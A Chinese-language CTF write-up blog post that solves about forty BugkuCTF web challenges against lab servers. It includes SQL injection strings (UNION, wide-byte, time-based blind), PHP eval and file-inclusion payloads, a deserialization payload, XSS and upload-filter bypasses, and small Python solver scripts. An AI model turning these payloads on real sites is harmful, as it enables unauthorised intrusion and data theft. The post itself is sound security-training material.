BugkuCTF WEB部分题解

主页,writeup,ctf,web,嘤嘤嘤 2018-04-18

0x00.前言
本篇文章只写给自己看。
纪录做题,与知识。
如果没更新完,那便鸽了吧。


0x01. web2
题目内容:听说聪明的人都能找到答案

f12查看源码
KEY{Web-2-bugKssNNikls9100}


0x02.文件上传测试
题目内容:
1、请上传PHP文件
2、文件上传大小不允许超过1M

随便上传一个php文件,Content-Type改为image/png(or jpeg/gif...).
Flag:42e97d465f962c53df9549377b513c7e


0x03.计算器

f12修改js代码即可.
flag{CTF-bugku-0032}


0x04.web基础$_GET

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

简单的get请求

http://120.24.86.145:8002/get/?what=flag

flag:flag{bugku_get_su8kej2en}


0x05.web基础$_POST

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}'

简单的post请求
将what=flagpost即可
flag:flag{bugku_get_ssseint67se}


0x06.矛盾

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

is_numeric()判断num是否为数字,但我们可以通过科学记数法绕过.
1.使用科学技术法可绕过:num=1e0.1
== 在进行比较的时候,会先将字符串类型转化成相同,再比较.
如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行.
当一个字符串被当作一个数值来取值,其结果和类型如下:如果该字符串没有包含'.','e','E'并且其数值在整形的范围之内
该字符串被当作int来取值,其他所有情况下都被作为float来取值,该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0.
2.使用1+字符串可绕过:num=1a
flag{bugku-789-ps-ssdf}


0x07.web3

弹窗点掉f12查看源码,底部html转义序列中数字字符即可.
随便写个脚本.

#!usr/bin/env python
#-*- coding:utf-8 -*-

import os

s='KEY{J2sa42ahJK-HS11III}'
s1=s.replace(';&#',' ').replace('yes','no')
s2=s1.replace('&#','').replace('yes','no')
s3=s2.replace(';',' ').replace('yes','no')
flag=''
i=0
while((s3[i:i+2])!=''):
    if(int(s3[i:i+2])>30):
        flag+=chr(int(s3[i:i+2]))
        i+=3
   else:
        flag+=chr(int(s3[i:i+3]))
        i+=4
print flag

KEY{J2sa42ahJK-HS11III}


0x08.sql注入

<meta charset="gb2312" />

f12查看源码,发现使用gb2312编码.
容易想到使用宽字节注入.

?id=1%df%27 union select 1,database() %23 #爆库sql5
?id=1%df%27 union select 1,string from sql5.key where id=1 %23 #得到flag

KEY{54f3320dc261f313ba712eb3f13a1f6d}


0x09.域名解析
题目内容:听说把 flag.bugku.com 解析到120.24.86.145就能拿到flag

这里使用firefox附加组件Modify Header Value(HTTP headers).
添加Host:flag.bugku.com,打开120.24.86.145,就能得到flag.
KEY{DSAHDSJ82HDS2211}


0x10.sql注入1
提示:过滤了关键字 你能绕过他吗

//过滤sql
$array =     array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
    if (substr_count($id, $value) > 0)
    {
        exit('包含敏感关键字!'.$value);
    }
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

其中strip_tags可以使用<>绕过.

?id=1 un<>ion sel<>ect 1,database() %23  #爆库sql3
?id=1 un<>ion sel<>ect 1,hash fr<>om sql3.key wh<>ere id=1 %23  #得到flag

KEY{c3d3c17b4ca7f791f85e#$1cc72af274af4adef}


0x11.你必须让他停下

打开查看源码不断f5直到flag.

flag{dummy_game_1s_s0_popular}


0x12.本地包含

 <?php
     include "flag.php";
     $a = @$_REQUEST['hello'];
     eval( "var_dump($a);");
     show_source(__FILE__);
 ?> 

构造payload:

hello=);print_r(file("./flag.php")); //   eval( "var_dump($a);")

flag{bug-ctf-gg-99}


0x13.变量1

<?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

看到eval("var_dump($$args);");,我们可以传入超全局变量获得flag.
$GLOBALS 这种全局变量用于在PHP脚本中的任意位置访问全局变量(从函数或方法中均可).
PHP在名为$GLOBALS[index]的数组中存储了所有全局变量.变量的名字就是数组的键.

?args=GLOBALS

flag{92853051ab894a64f7865cf3c2128b34}


0x14.web5

查看源码一段jsfuck代码,f12扔进控制台即可.

CTF{WHATFK}


0x15.头等舱

抓包在响应包里看到flag.

flag{Bugku_k8_23s_istra}


0x16.web4
题目内容:看看源代码吧

var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));

代码意义就是输出p1+%35%34%61%61%32+p2
写个脚本或随便找个网站解密url编码.

#!usr/bin/env python
#-*- coding:utf-8 -*-

import urllib

s='%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62%35%34%61%61%32%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b'
print urllib.unquote(s)

解密又是一段代码.

function checkSubmit()
{
    var a=document.getElementById("password");
    if("undefined"!=typeof a)
    {
        if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)
            return!0;
        alert("Error");
        a.focus();
        return!1
    }
}
document.getElementById("levelQuest").onsubmit=checkSubmit;

看到重要代码if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value),输入67d709b2b54aa2aa648cf6e87a7114f1即可获取flag.

KEY{J22JK-HS11}


0x17.flag在index里

看到参数file,猜测文件包含,结合题目.

?file=php://filter/read=convert.base64-encode/resource=index.php

一段base64编码,解码看到flag.

flag{edulcni_elif_lacol_si_siht}


0x18.输入密码查看flag

抓包使用burpsuite的intruder进行五位数字爆破.

数字为13579时得到flag.

flag{bugku-baopo-hah}


0x19.点击一百万下

简单的js代码,post clicks=1000000即可得到flag.

flag{Not_C00kI3Cl1ck3r}


0x20.备份是个好习惯

猜测可能是源码泄露,输入index.php.bak得到源码.

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

代码过滤了一个key,于是构造payload.

?kkeyey1[]=a&kkeyey2[]=b

Bugku{OH_YOU_FIND_MY_MOMY}


0x21.成绩单

查列为3.

库名   skctf_flag
id=' union select 1,1,1,group_concat(schema_name) from information_schema.SCHEMATA#  
表名   fl4g
id=' union select 1,1,1,group_concat(table_name) from information_schema.TABLES where table_schema='skctf_flag'#
字段名  skctf_flag
id=' union select 1,1,1,group_concat(column_name) from information_schema.COLUMNS where table_name='fl4g'#
flag
id=' union select 1,1,1,group_concat(skctf_flag) from fl4g #

BUGKU{Sql_INJECT0N_4813drd8hz4}


0x22.秋名山老司机

正则表达式匹配算术表达式,将最后的值(value)post即可.

#!usr/bin/env python
#-*- coding:utf-8 -*-

import requests
import re
import os
url='http://120.24.86.145:8002/qiumingshan/'
s=requests.Session()
r=s.get(url)
math=re.findall('<div>(.*)=?;</div>',r.text)
math=''.join(math)  
math=math.replace('=?','').replace('yes','no')
data={"value":eval(math)}
r=s.post(url,data)
print r.text

多跑几次才能出flag.
Bugku{YOU_DID_IT_BY_SECOND}


0x23.速度要快

抓包看到响应包头部有flag,经过两次base64加密.
提示把margin post即可.
写脚本

#!usr/bin/env python
#-*- coding:utf-8 -*-

import base64
import urllib2
import requests

url='http://120.24.86.145:8002/web6/'
response=urllib2.urlopen(url)
flag=base64.b64decode(base64.b64decode(response.headers['flag']).split(':')[1])
s=requests.Session()
flag={'margin':flag}
print s.post(url,flag).text

建议换个cpu跑脚本.
KEY{111dd62fcd377076be18a}


0x24.cookies欺骗

看到url里有串base64编码,解密为keys.txt.
想读index.php,于是将index.php编码替换,发现没有回显.
看到url里还有一个参数line,随便输一个1发现有回显,写个脚本遍历line.

#!usr/bin/env python
#-*- coding:utf-8 -*-

import requests
import base64

r=requests.Session()
for i in range(0,40):
    print r.get('http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw'%i).text

得到源码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){ 
    $fa = file($file);
    echo $fa[$line];
}
?>

将keys.php编码后传入,将cookie:margin=margin传入,拿到flag.

KEY{key_keys}


0x25.XSS

查看源码.

var s="";    document.getElementById('s').innerHTML = s;

这里吐槽一下用id传参.

?id=<script>alert(key)</script>

发现<>被过滤.
于是使用unicode编码绕过.

?id=\u003cscript\u003ealert(_key_)\u003c/script\u003e

Flag:17f094325e90085b30a5ddefce34acd8


0x26.never give up

源码提示1p.html.
抓包,看到奇怪字符串.

<!--
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" 
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
OutWord();
// -->

写个脚本解密.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib
import base64

s='%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E'
print urllib.unquote(s)
s='JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ=='
print base64.b64decode(s)
s='%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E'
print urllib.unquote(s)

最后得到

";if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and    eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>

file_get_contentsphp://input绕过.
eregi()可以用%00截断
payload:id=%00&a=php://input&b=%001114
postdata:bugku is a nice plateform!
但是直接访问f4l2a3g.txt就能拿到flag. ??????????wtf
flag{tHis_iS_THe_fLaG}


0x27.welcome to bugkuctf

f12查看源码.

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

老套路
file_get_contentsphp://input绕过
文件读取hint.php
payload:?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php
postdata:welcome to the bugkuctf
base64解密,拿到源码.

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  

验证了payload可用
再次文件读取index.php,拿到本题所有源码.

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  
<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
            echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
?>  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
--->  

关键代码

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
----------------------------------------------
if(preg_match("/flag/",$file)){ 
            echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;
--------------------------------------------
<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  

第一段代码当user=welcome to the bugkuctf进入循环,然后进入反序列化代码.
第二段代码当我们尝试读取flag.php时,就会报错,进入else通过反序列化password,最后输出password的内容,所以我们可以让password=flag.php,最后输出.
第三段代码典型的反序列化代码,不多解释.
payload:?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
postdata:welcome to the bugkuctf
flag{php_is_the_best_language}


0x28.过狗一句话

首先我们知道php中查看文件的函数有

print_r
var_dump
show_source

匹配文件函数有

glob()
Scandir()

那么开始吧.

?s=var_dump(glob('*.txt'))
array(7) { [0]=> string(7) "123.txt" [1]=> string(5) "a.txt" [2]=> string(8) "flag.txt" [3]=> string(7) "ldl.txt" [4]=> string(10) "olivia.txt" [5]=> string(12) "testfile.txt" [6]=> string(16) "zaizheliflag.txt" } 坑爹的题目,To JBfei!
---------------------------------------------------------------------------------------------
?s=var_dump(glob('*.php'))
array(27) { [0]=> string(5) "1.php" [1]=> string(5) "2.php" [2]=> string(5) "3.php" [3]=> string(5) "4.php" [4]=> string(5) "5.php" [5]=> string(5) "a.php" [6]=> string(5) "c.php" [7]=> string(11) "chaoba1.php" [8]=> string(11) "chaoba2.php" [9]=> string(8) "ddee.php" [10]=> string(5) "f.php" [11]=> string(5) "h.php" [12]=> string(8) "haha.php" [13]=> string(9) "index.php" [14]=> string(6) "ll.php" [15]=> string(11) "loshell.php" [16]=> string(11) "oudeniu.php" [17]=> string(11) "phpspy1.php" [18]=> string(5) "q.php" [19]=> string(6) "t2.php" [20]=> string(9) "txxxc.php" [21]=> string(5) "x.php" [22]=> string(6) "xb.php" [23]=> string(8) "xxoo.php" [24]=> string(9) "xxoos.php" [25]=> string(7) "xxx.php" [26]=> string(6) "zx.php" } 坑爹的题目,To JBfei!
---------------------------------------------------------------------------------------------
?s=var_dump(Scandir('./'))
array(44) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(5) "1.php" [3]=> string(7) "123.txt" [4]=> string(5) "2.php" [5]=> string(5) "3.php" [6]=> string(5) "4.php" [7]=> string(5) "5.php" [8]=> string(11) " string(21) " string(22) " string(13) "README.README" [12]=> string(5) "a.php" [13]=> string(5) "a.txt" [14]=> string(5) "c.php" [15]=> string(6) "chaoba" [16]=> string(11) "chaoba.aspx" [17]=> string(11) "chaoba1.php" [18]=> string(11) "chaoba2.php" [19]=> string(4) "conn" [20]=> string(8) "ddee.php" [21]=> string(6) "f.html" [22]=> string(5) "f.php" [23]=> string(8) "flag.txt" [24]=> string(5) "h.php" [25]=> string(8) "haha.php" [26]=> string(9) "index.php" [27]=> string(7) "ldl.txt" [28]=> string(6) "ll.php" [29]=> string(11) "loshell.php" [30]=> string(10) "olivia.txt" [31]=> string(11) "oudeniu.php" [32]=> string(11) "phpspy1.php" [33]=> string(5) "q.php" [34]=> string(6) "t2.php" [35]=> string(12) "testfile.txt" [36]=> string(9) "txxxc.php" [37]=> string(5) "x.php" [38]=> string(6) "xb.php" [39]=> string(8) "xxoo.php" [40]=> string(9) "xxoos.php" [41]=> string(7) "xxx.php" [42]=> string(16) "zaizheliflag.txt" [43]=> string(6) "zx.php" } 坑爹的题目,To JBfei!

payload:?s=show_source('flag.txt')
BUGKU{bugku_web_009801_a}


0x29.字符?正则?

绕过正则表达式.

 <?php 
 highlight_file('2.php');
 $key='KEY{********************************}';
 $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
 if( $IM ){ 
   die('key is: '.$key);
 }
 ?>

本人正则表达式已经疲弱,直接放上大哥的解析.

  1. 表达式直接写出来的字符串直接利用,如key
  2. “.”代表任意字符
  3. “*”代表一个或一序列字符重复出现的次数,即前一个字符重复任意次,这里可以是0次,还有就是以’^’开头,以’$’结束
  4. “/”代表“/”,一种转义,因为单独的//代表着正则的开始与结束
  5. [a-z]代表a-z中的任意一个字符
  6. [[:punct:]]代表任意一个字符,包括各种符号,记得是符号
  7. /i代表大小写不敏感
  8. {4-7}代表[0-9]中数字连续出现的次数是4-7次
  9. \s匹配任意的空白符
  10. \d 匹配数字
  11. \b 匹配单词的开始或结束

payload:?id=keykekeykeykeykey:/k/kekeya[:]

flag:KEY{0x0SIOPh550afc}


0x30.前女友(SKCTF)

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

简单的md5和相等比较,以及strcmp函数绕过

http://118.89.219.210:49162/index.php?v1=240610708&v2=QNKCDZO&v3[]=

SKCTF{Php_1s_tH3_B3St_L4NgUag3}


0x31.login1(SKCTF)

百度sql约束攻击,得到以下内容

需要注意的是,在执行SELECT查询语句时,SQL是不会将字符串缩短为25个字符的。因此,这里将使用完整的字符串进行搜索,所以不会找到匹配的结果。接下来,当执行INSERT查询语句时,它只会插入前25个字符。

这里我们只需要注册一个账号大于25位的admin账号进行登陆,就能拿到admin数据

SKCTF{4Dm1n_HaV3_GreAt_p0w3R}


0x32.你从哪里来

are you from google?

添加referer头部字段

referer: https://www.google.com

flag{bug-ku_ai_admin}


0x33.md5 collision

$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}

简单的md5比较绕过

http://120.24.86.145:9009/md5.php?a=240610708

flag{md5_collision_is_easy}


0x34.各种绕过

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>

简单的sha1()绕过即可

http://120.24.86.145:8002/web7/?uname[]=1&id=margin
post:passwd[]=2

flag{HACK_45hhs_213sDD}


0x35.web8

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

extract可以将$_GET数组的值转为变量,默认是如果有冲突,则覆盖已有的变量

http://120.24.86.145:8002/web8/?fn=php://input&ac=1
post:1

flag{3cfb7a90fc0de31}


0x36.细心

进来没看到东西
习惯打开robots.txt,发现resul1.php
关键代码

if ($_GET[x]==$password)

题目提示变成admin
payload:x=admin

flag(ctf_0098_lkji-s)


0x36.求getshell

My name is margin,give me a image file not a php

上传
题目提示上传图片,看到php估计跟后缀名有关.
修改后缀名,发现无法绕过.
这里想到修改Content-Type: multipart/form-dataContent-Type: Multipart/form-data
绕过大小写,成功得到flag.

KEY{bb35dc123820e}


0x37.INSERT INTO注入

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

这题不是很懂
这里直接引用学校大佬l1k3r的writeup了
从代码来看,应该是X_FORWARDED_FOR注入了,但是过滤了,.在过滤了逗号的情况下,就无法使用if语句了,当然在mysql下除了if还有一个功能的东西

select case when xxx then xxx else xxx end;

而且由于,被过滤,无法使用substrsubstring,但是这里可以使用from 1 for 1替代,最后payload如下:

11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23
